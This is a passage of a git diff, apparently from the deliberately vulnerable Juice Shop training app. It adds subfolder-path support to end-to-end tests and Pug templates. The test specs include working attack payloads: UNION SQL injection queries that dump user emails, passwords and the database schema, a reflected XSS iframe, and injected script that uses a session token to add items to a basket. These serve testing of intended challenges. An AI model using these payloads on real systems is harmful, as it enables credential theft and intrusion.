     if (config.get('challenges.showSolvedNotifications') && config.get('ctf.showFlagsInNotifications')) {
diff --git a/test/e2e/searchSpec.js b/test/e2e/searchSpec.js
index 0eaa36fda5b..cb3ba0a1e7e 100644
--- a/test/e2e/searchSpec.js
+++ b/test/e2e/searchSpec.js
@@ -12,7 +12,7 @@ describe('/#/search', () => {
   let searchQuery
 
   beforeEach(() => {
-    browser.get('/#/search') // not really necessary as search field is part of navbar on every dialog
+    browser.get(protractor.basePath + '/#/search') // not really necessary as search field is part of navbar on every dialog
     searchQuery = element(by.id('searchQuery'))
   })
 
@@ -49,7 +49,7 @@ describe('/#/search', () => {
 describe('/rest/products/search', () => {
   describe('challenge "unionSqlInjection"', () => {
     it('query param in product search endpoint should be susceptible to UNION SQL injection attacks', () => {
-      browser.driver.get(`${browser.baseUrl}/rest/products/search?q=')) union select id,'2','3',email,password,'6','7','8','9' from users--`)
+      browser.driver.get(browser.baseUrl + "/rest/products/search?q=')) union select id,'2','3',email,password,'6','7','8','9' from users--")
     })
 
     protractor.expect.challengeSolved({ challenge: 'User Credentials' })
@@ -57,7 +57,7 @@ describe('/rest/products/search', () => {
 
   describe('challenge "dbSchema"', () => {
     it('query param in product search endpoint should be susceptible to UNION SQL injection attacks', () => {
-      browser.driver.get(`${browser.baseUrl}/rest/products/search?q=')) union select sql,'2','3','4','5','6','7','8','9' from sqlite_master--`)
+      browser.driver.get(browser.baseUrl + "/rest/products/search?q=')) union select sql,'2','3','4','5','6','7','8','9' from sqlite_master--")
     })
 
     protractor.expect.challengeSolved({ challenge: 'Database Schema' })
@@ -86,12 +86,12 @@ describe('/rest/products/search', () => {
       browser.waitForAngularEnabled(false)
       models.sequelize.query('SELECT * FROM PRODUCTS').then(([products]) => {
         var christmasProductId = products.filter(product => product.name === christmasProduct.name)[0].id
-        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function () { if (this.status === 201) { console.log("Success") } } ; xhttp.open("POST", "http://localhost:3000/api/BasketItems/", true); xhttp.setRequestHeader("Content-type", "application/json"); xhttp.setRequestHeader("Authorization", `Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"BasketId": `${sessionStorage.getItem("bid")}`, "ProductId":' + christmasProductId + ', "quantity": 1}))') // eslint-disable-line
+        browser.executeScript('var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function () { if (this.status === 201) { console.log("Success") } } ; xhttp.open("POST", "'+browser.baseUrl+'/api/BasketItems/", true); xhttp.setRequestHeader("Content-type", "application/json"); xhttp.setRequestHeader("Authorization", `Bearer ${localStorage.getItem("token")}`); xhttp.send(JSON.stringify({"BasketId": `${sessionStorage.getItem("bid")}`, "ProductId":' + christmasProductId + ', "quantity": 1}))') // eslint-disable-line
       })
       browser.driver.sleep(1000)
       browser.waitForAngularEnabled(true)
 
-      browser.get('/#/basket')
+      browser.get(protractor.basePath + '/#/basket')
       browser.wait(protractor.ExpectedConditions.presenceOf($('mat-table')), 5000, 'Basket item list not present.') // eslint-disable-line no-undef
       element(by.id('checkoutButton')).click()
     })
diff --git a/test/e2e/tokenSaleSpec.js b/test/e2e/tokenSaleSpec.js
index 6b4093512b0..272c0c978db 100644
--- a/test/e2e/tokenSaleSpec.js
+++ b/test/e2e/tokenSaleSpec.js
@@ -6,7 +6,7 @@
 describe('/#/tokensale-ico-ea', () => {
   describe('challenge "tokenSale"', () => {
     it('should be possible to access token sale section even when not authenticated', () => {
-      browser.get('/#/tokensale-ico-ea')
+      browser.get(protractor.basePath + '/#/tokensale-ico-ea')
       expect(browser.getCurrentUrl()).toMatch(/\/tokensale-ico-ea/)
     })
 
diff --git a/test/e2e/totpSetupSpec.js b/test/e2e/totpSetupSpec.js
index 33ef10e4f91..c28afda5a6f 100644
--- a/test/e2e/totpSetupSpec.js
+++ b/test/e2e/totpSetupSpec.js
@@ -35,7 +35,7 @@ describe('/#/basket', () => {
     })
 
     it('should show an success message for 2fa enabled accounts', () => {
-      browser.get('/#/privacy-security/two-factor-authentication')
+      browser.get(protractor.basePath + '/#/privacy-security/two-factor-authentication')
 
       browser.wait(EC.visibilityOf(successMessage), 5000, '2FA success message didnt show up for an 2fa enabled account in time')
     })
@@ -45,7 +45,7 @@ describe('/#/basket', () => {
     protractor.beforeEach.login({ email: 'amy@' + config.get('application.domain'), password: 'K1f.....................' })
 
     it('should be possible to setup 2fa for a account without 2fa enabled', async () => {
-      browser.get('/#/privacy-security/two-factor-authentication')
+      browser.get(protractor.basePath + '/#/privacy-security/two-factor-authentication')
 
       browser.wait(EC.visibilityOf(setupInstructions), 5000, '2FA setup instructions should show up for users without 2fa enabled')
 
diff --git a/test/e2e/trackingOrderSpec.js b/test/e2e/trackingOrderSpec.js
index 5003dc9e71f..db9a112a85a 100644
--- a/test/e2e/trackingOrderSpec.js
+++ b/test/e2e/trackingOrderSpec.js
@@ -11,9 +11,9 @@ describe('/#/track-order', () => {
       it('Order Id should be susceptible to reflected XSS attacks', () => {
         const EC = protractor.ExpectedConditions
 
-        browser.get('/#/track-result')
+        browser.get(protractor.basePath + '/#/track-result')
         browser.waitForAngularEnabled(false)
-        browser.get('/#/track-result?id=<iframe src="javascript:alert(`xss`)">')
+        browser.get(protractor.basePath + '/#/track-result?id=<iframe src="javascript:alert(`xss`)">')
         browser.refresh()
 
         browser.wait(EC.alertIsPresent(), 5000, "'xss' alert is not present on /#/track-result ")
diff --git a/test/e2eSubfolder.js b/test/e2eSubfolder.js
new file mode 100644
index 00000000000..2ba00757297
--- /dev/null
+++ b/test/e2eSubfolder.js
@@ -0,0 +1,44 @@
+/*
+ * Copyright (c) 2014-2020 Bjoern Kimminich.
+ * SPDX-License-Identifier: MIT
+ */
+
+const app = require('express')()
+const server = require('http').Server(app)
+const request = require('request')
+const colors = require('colors/safe')
+const logger = require('./../lib/logger')
+const serverApp = require('./../server.js')
+
+const url = require('url')
+const originalBase = require('../protractor.conf.js').config.baseUrl
+const baseUrl = new url.URL(require('../protractor.subfolder.conf.js').config.baseUrl)
+const basePath = baseUrl.pathname
+const proxyPort = baseUrl.port
+process.env.basePath = basePath
+
+app.use('/subfolder', (req, res) => {
+  const proxyUrl = originalBase + req.url
+  req.pipe(request({ qs: req.query, uri: proxyUrl })).pipe(res)
+})
+
+exports.start = async function (readyCallback) {
+  serverApp.start(() => {
+    server.listen(proxyPort, () => {
+      logger.info(colors.cyan(`Subfolder proxy listening on port ${proxyPort}`))
+
+      if (readyCallback) {
+        readyCallback()
+      }
+    })
+  })
+}
+
+exports.close = function (exitCode) {
+  return serverApp.close(exitCode)
+}
+
+const ownFilename = __filename.slice(__dirname.length + 1)
+if (process.argv && process.argv.length > 1 && process.argv[1].endsWith(ownFilename)) {
+  exports.start()
+}
diff --git a/test/e2eTests.js b/test/e2eTests.js
index fae07e0ed28..8dc6b0936f2 100644
--- a/test/e2eTests.js
+++ b/test/e2eTests.js
@@ -5,10 +5,18 @@
 
 const spawn = require('cross-spawn')
 const colors = require('colors/safe')
-const server = require('./../server.js')
+
+let server, confName
+if (process.argv && process.argv.length >= 3 && process.argv[2] === 'subfolder') {
+  server = require('./e2eSubfolder.js')
+  confName = 'protractor.subfolder.conf.js'
+} else {
+  server = require('../server.js')
+  confName = 'protractor.conf.js'
+}
 
 server.start(() => {
-  const protractor = spawn('protractor', ['protractor.conf.js'])
+  const protractor = spawn('protractor', [confName])
   function logToConsole (data) {
     console.log(String(data))
   }
diff --git a/views/promotionVideo.pug b/views/promotionVideo.pug
index eedf659b4f1..32ee15101a9 100644
--- a/views/promotionVideo.pug
+++ b/views/promotionVideo.pug
@@ -6,7 +6,7 @@ html(lang='en')
         meta(name='description', content='')
         meta(name='keywords', content='')
         meta(name='viewport' content='width=device-width, initial-scale=1.0')
-        link(rel='icon', type='image/x-icon', href='/assets/public/_favicon_')
+        link(rel='icon', type='image/x-icon', href='./assets/public/_favicon_')
         link(rel='stylesheet', href='https://code.getmdl.io/1.3.0/material.min.css')
         link(rel='stylesheet', href='https://fonts.googleapis.com/icon?family=Material+Icons')
         link(rel='stylesheet', href='http://fonts.googleapis.com/css?family=Roboto:300,400,500,700', type='text/css')
@@ -32,16 +32,16 @@ html(lang='en')
         .mdl-layout.mdl-js-layout.mdl-layout--fixed-header
           header.mdl-layout__header.mdl-shadow--8dp(style= 'background: _navColor_; height: auto; min-width: 100%; padding-bottom: 5px; width: 100%;')
             .mdl-layout__header-row
-              a(href='/#/' style='color: _textColor_; text-decoration:none; margin-left: -50px;')
+              a(href='./#/' style='color: _textColor_; text-decoration:none; margin-left: -50px;')
                 i(class='material-icons', style='display: block;margin-bottom: auto;margin-top: auto; margin-right: 10px;') arrow_back
-              a(href='/#/' style='color: _textColor_; text-decoration:none;')
+              a(href='./#/' style='color: _textColor_; text-decoration:none;')
                 span(style='margin-right: 20px;')
                   | Back
               // Logo
-              a(href='/#/')
+              a(href='./#/')
                 img(src='assets/public/images/JuiceShop_Logo.png', style='max-height: 60px; width: auto;', alt='_title_ Logo')
               // Title
-              a(href='/#/' style='color: _textColor_; text-decoration:none;')
+              a(href='./#/' style='color: _textColor_; text-decoration:none;')
                span.mdl-layout-title(style='font: 500 20px/32px Roboto,"Helvetica Neue",sans-serif;')
                  | _title_
 
@@ -49,7 +49,7 @@ html(lang='en')
            .mdl-card#card.mdl-cell.mdl-cell--12-col.mdl-shadow--8dp(style='width: 45vw; min-width: 320px; height: 58vh; background: _primLight_; margin-bottom: 50px; margin-top: 110px; display: block; margin-left: auto; margin-right:auto; ')
             h1(style='color: _textColor_; font-size: 24px; line-height: 32px; margin-top: 16px; margin-bottom: 16px; font-weight: 400; margin-left: 16px;') Promotion Video
             video(width='85vw', height='240', controls='controls')
-               source(src='/video', type='video/mp4')
+               source(src='./video', type='video/mp4')
 
         script#subtitle.
 
diff --git a/views/userProfile.pug b/views/userProfile.pug
index c3780b3fd74..19d64fd95fb 100644
--- a/views/userProfile.pug
+++ b/views/userProfile.pug
@@ -6,10 +6,10 @@ html(lang='en')
         meta(name='description', content='')
         meta(name='keywords', content='')
         meta(name='viewport' content='width=device-width, initial-scale=1.0')
-        link(rel='icon', type='image/x-icon', href='/assets/public/_favicon_')
+        link(rel='icon', type='image/x-icon', href='./assets/public/_favicon_')
         link(rel='stylesheet', href='https://code.getmdl.io/1.3.0/material.min.css')
         link(rel='stylesheet', href='https://fonts.googleapis.com/icon?family=Material+Icons')
-        link(rel='stylesheet', href='/assets/public/css/userProfile.css', type='text/css')
+        link(rel='stylesheet', href='./assets/public/css/userProfile.css', type='text/css')
         link(rel='stylesheet', href='http://fonts.googleapis.com/css?family=Roboto:300,400,500,700', type='text/css')
         script(src='//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js')
         script(src='https://code.getmdl.io/1.3.0/material.min.js')
@@ -22,16 +22,16 @@ html(lang='en')
         .mdl-layout.mdl-js-layout.mdl-layout--fixed-header
           header.mdl-layout__header.mdl-shadow--8dp(style= 'background: _navColor_; height: auto; min-width: 100%; padding-bottom: 5px; width: 100%;')
             .mdl-layout__header-row
-              a(href='/#/' style='color: _textColor_; text-decoration:none; margin-left: -50px;')
+              a(href='./#/' style='color: _textColor_; text-decoration:none; margin-left: -50px;')
                 i(class='material-icons', style='display: block;margin-bottom: auto;margin-top: auto; margin-right: 10px;') arrow_back
-              a(href='/#/' style='color: _textColor_; text-decoration:none;')
+              a(href='./#/' style='color: _textColor_; text-decoration:none;')
                 span(style='margin-right: 20px;')
                   | Back
               // Logo
-              a(href='/#/')
+              a(href='./#/')
                 img(src='assets/public/images/_logo_', style='max-height: 60px; width: auto;', alt='_title_ Logo')
               // Title
-              a(href='/#/' style='color: _textColor_; text-decoration:none;')
+              a(href='./#/' style='color: _textColor_; text-decoration:none;')
                 span.mdl-layout-title(style='font: 500 20px/32px Roboto,"Helvetica Neue",sans-serif;')
                   | _title_
 
@@ -43,7 +43,7 @@ html(lang='en')
                  .mdl-cell.mdl-cell--6-col-desktop.mdl-cell--12-col-tablet.mdl-cell--12-col-phone
                     img.img-rounded(src=profileImage, alt='profile picture', width='90%', height='236', style='margin-right: 5%; margin-left: 5%;')
                     p(style='margin-top:8%; color: _textColor_; text-align: center;') _username_
-                    form(action='/profile/image/file' , style='margin-top:10%; width: 90%; margin-right: auto; margin-left: auto;', method='post', enctype='multipart/form-data')
+                    form(action='./profile/image/file' , style='margin-top:10%; width: 90%; margin-right: auto; margin-left: auto;', method='post', enctype='multipart/form-data')
                       .form-group
                         label(for='picture', style='color: _textColor_; font-size: 12px;') File Upload:
                         input#picture(type='file', accept='image/*', name='file', size='150', style='color: _textColor_; margin-top: 4px;', aria-label='Input for selecting the profile picture')
@@ -60,7 +60,7 @@ html(lang='en')
                       .line
                         div
 
-                    form(action='/profile/image/url' , style='margin-top:5%; width: 90%; margin-right: auto; margin-left: auto;', method='post')
+                    form(action='./profile/image/url' , style='margin-top:5%; width: 90%; margin-right: auto; margin-left: auto;', method='post')
                       .form-group
                         .mdl-textfield.mdl-js-textfield.mdl-textfield--floating-label(style='width: 100%;')
                           input#url.form-control.mdl-textfield__input(type='text', name='imageUrl', style='color: _textColor_;', placeholder='e.g. https://www.gravatar.com/avatar/_emailHash_', aria-label='Text field for the image link')
@@ -69,7 +69,7 @@ html(lang='en')
                       p(style='margin-bottom:10%;')
 
                  .mdl-cell.mdl-cell--6-col-desktop.mdl-cell--12-col-tablet.mdl-cell--12-col-phone
-                   form(action='/profile', method='post', style='width: 90%; margin-right: auto; margin-left: auto;')
+                   form(action='./profile', method='post', style='width: 90%; margin-right: auto; margin-left: auto;')
                      .form-group
                          .mdl-textfield.mdl-js-textfield.mdl-textfield--floating-label(style='width: 100%; opacity: 0.7')
                             input#email.form-control.mdl-textfield__input(type='email', name='email', value=email, disabled=true, style='color: _textColor_;', aria-label='Disabled - Text field for the email')